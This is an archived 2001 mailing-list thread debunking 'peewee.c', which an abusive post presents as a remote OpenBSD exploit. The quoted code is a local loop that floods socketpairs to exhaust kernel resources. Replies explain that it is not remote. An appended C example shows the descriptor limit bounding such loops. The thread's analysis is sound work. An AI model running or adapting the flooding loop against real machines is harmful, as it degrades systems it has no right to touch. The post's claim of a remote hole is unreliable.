Unless this is part of something larger, its current form is entirely bogus.
_UNIX is a UNIX domain socket. There is no "remote" exploit here. I think
the individual is upset about something. Nothing like publicly making an ..
well, you know.

"man socket" and search for AF_UNIX if you are curious.

-brad

At 02:03 PM 6/6/2001 -0400, max wrote:
>The code doesn't do anything. I ran it on an obsd 2.8 machine and the state
>of the machine after execution was the same as before. From what i understand
>from this code, it simply opens up 2 local (PF_UNIX) sockets, and writes
>some garbage to both of them. socket option calls change receive and
>send buffers on the socket, which i guess has something to do with the
>size of the garbage we send to the local sockets. fcntl call sets non
>block flag on the sockets (i'm not sure i understand what this is, and the
>man pages are rather concise on this, but i guess it makes it a non-block
>device?), and then two write calls, where the crap gets written into
>sockets.
>now, i am by no means an expert or even an experienced programmer, and
>this analysis is my attempt to understand unix programming better, so
>please, all flames are welcome. i'm posting this just to see if my
>assumptions are correct, not to actually give a guru-level analysis. (so if
>this isn't posted, i'll live)
>
>thanks for letting me waste everyone's time : )
>
>max
>
>
> > Fsck Theo Dumbraadt wrote:
> >
> > This code shows a remote exploit for OpenBSD versions 2.8 and 2.9
> > and can now be released to the public to break theo's 4 years without
> > remote exploits sayings. I wrote it while people told me it could not
> > happen on the list so here is your proofs bitch.
> >
> > //
> > // peewee.c
> > // peewee herman proof of concept this code will show all of the
> > // world how vulnerable OpenBSD is and how Theo Dumbraadt is
> > // not more than a liar copyraadt 2001 by Jigglypuff
> > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> > // this proggie is GPL licensed to those who use it keep my
> > // credits and not be a lamer
> > //
> > #include <unistd.h>
> > #include <sys/socket.h>
> > #include <fcntl.h>
> > #define BUFFERSIZE 409600
> > extern int
> > main(void)
> > {
> >         int p[2], i;
> >         char crap[BUFFERSIZE];
> >         while (1)
> >         {
> >                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> >                         break;
> >                 i = BUFFERSIZE;
> >                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 fcntl(p[0], F_SETFL, O_NONBLOCK);
> >                 fcntl(p[1], F_SETFL, O_NONBLOCK);
> >                 write(p[0], crap, BUFFERSIZE);
> >                 write(p[1], crap, BUFFERSIZE);
> >         }
> >         return(0);
> > }
> >
> > * Get your free email at http://www.inbox.net
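
Added example, not part of the thread and not any poster's code: the two behaviours discussed above, isolated in C for a POSIX system. The first function shows what O_NONBLOCK changes about write() on a socketpair, the second shows that a loop which keeps opening pairs ends at the process's descriptor limit. The function names, MAX_PAIRS and the limit of 64 are choices made for this example.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

#define BUFFERSIZE 409600   /* same size as the quoted program */
#define MAX_PAIRS  256      /* bookkeeping cap chosen for this demo */

/* O_NONBLOCK with nobody reading: write() accepts what fits in the socket
 * buffer, then fails with EAGAIN instead of sleeping. Added example. */
int nonblocking_write_demo(ssize_t *first, int *refused_errno)
{
    static char data[BUFFERSIZE];           /* constructed payload, all zeros */
    int p[2];
    ssize_t n;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    fcntl(p[0], F_SETFL, O_NONBLOCK);
    *first = n = write(p[0], data, sizeof data);
    while (n > 0)                           /* fill any space that is left */
        n = write(p[0], data, sizeof data);
    *refused_errno = errno;
    close(p[0]);
    close(p[1]);
    return 0;
}

/* Opens socketpairs without closing them, as the quoted loop does, under a
 * lowered soft RLIMIT_NOFILE. Returns the pairs that fit; stores the errno. */
int pairs_until_limit(rlim_t limit, int *fail_errno)
{
    struct rlimit old, low;
    int fds[2 * MAX_PAIRS], n = 0, i;
    if (getrlimit(RLIMIT_NOFILE, &old) == -1)
        return -1;
    low = old;
    low.rlim_cur = limit;
    if (setrlimit(RLIMIT_NOFILE, &low) == -1)
        return -1;
    while (n < MAX_PAIRS && socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2 * n]) == 0)
        n++;
    *fail_errno = (n < MAX_PAIRS) ? errno : 0;
    for (i = 0; i < 2 * n; i++)
        close(fds[i]);
    setrlimit(RLIMIT_NOFILE, &old);         /* restore the soft limit */
    return n;
}

int main(void) { ssize_t f; int e; return nonblocking_write_demo(&f, &e) || pairs_until_limit(64, &e) < 1; }
```

With a soft limit of 64 descriptors, at most 32 pairs can exist at once, so the data queued in socket buffers is bounded by the descriptor limit times the per-socket buffer size the kernel grants.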
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 22:20:42 PDT